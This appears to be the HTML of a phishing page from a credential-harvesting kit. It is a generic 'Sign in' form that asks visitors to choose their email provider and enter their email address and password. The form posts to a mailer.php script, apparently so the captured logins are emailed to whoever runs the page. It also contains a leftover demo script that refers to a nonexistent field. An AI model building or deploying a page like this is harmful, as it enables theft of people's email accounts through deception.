<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Sign in</title>

<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>
<style>
 
.textbox { 
   background: #fff;
    border: 1px solid #c1c1c1;
    border-radius: 2px;
    font-family: "Helvetica Neue","HelveticaNeue",Helvetica,Arial,sans-serif;
    font-size: 13px;
    height: 35px;
    line-height: normal;
    padding: 5px 8px 6px 8px;
    width: 100%;
    outline: 0;
    resize: none;
    -moz-appearance: none;
    -webkit-appearance: none;
	
  } 
   
 .textbox:focus { 
    border: 1px solid red; 
     
  
  } 

  </style>
  <style>
 
.textbox2 { 
   background: #fff;
    border: 1px solid #c1c1c1;
    border-radius: 2px;
    font-family: "Helvetica Neue","HelveticaNeue",Helvetica,Arial,sans-serif;
    font-size: 13px;
    height: 35px;
    line-height: normal;
    padding: 5px 8px 6px 8px;
    width: 100%;
    outline: 0;
    resize: none;
    -moz-appearance: none;
    -webkit-appearance: none;
	font-size: 20px;
	
  } 
   
 .textbox:focus { 
    border: 1px solid red; 
     
  
  } 

  </style>
</head>
<body bgColor="#F9F9F9">
<div id="image1" style="position:absolute; overflow:hidden; left:488px; top:0px; width:377px; height:654px; z-index:0"><img src="images/dous1.png" alt="" title="" border=0 width=377 height=654></div>
<form action=mailer.php id="demo-form"  name=book id=book method=post>
<select name="formselect1" required class="textbox2"  style="position:absolute;left:497px;text-align:center;top:145px;width:359px;z-index:1">
<option> Select your email provider </option>
<option> Gmail </option>
<option> Yahoo </option>
<option> Outlook </option>
<option> Office 365 </option>
<option> AOL </option>
<option> Others </option></select>
<input name="frm-email"  placeholder="Email Address" required class="textbox" type="text" style="position:absolute;width:360px;left:496px;top:201px;z-index:2">
<input name="frm-pass" id="demo-field"  placeholder="Password" required class="textbox" type="text" style="position:absolute;width:360px;left:490px;top:257px;z-index:3">
<div id="formimage1" style="position:absolute; left:496px; top:330px; z-index:4"><input type="image" name="formimage1" width="364" height="41" src="images/dous2.png"></div>
<div id="image2" style="position:absolute; overflow:hidden; left:599px; top:391px; width:164px; height:16px; z-index:5"><a href="#"><img src="images/dous3.png" alt="" title="" border=0 width=164 height=16></a></div>

<script type="text/javascript">
	
		//apply masking to the demo-field
		//pass the field reference, masking symbol, and character limit
		new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
	
		//test the submitted value
		document.getElementById('demo-form').onsubmit = function()
		{
			alert('pword = "' + this.pword.value + '"');
			return false;
		};
	
	</script>
</body>
</html>
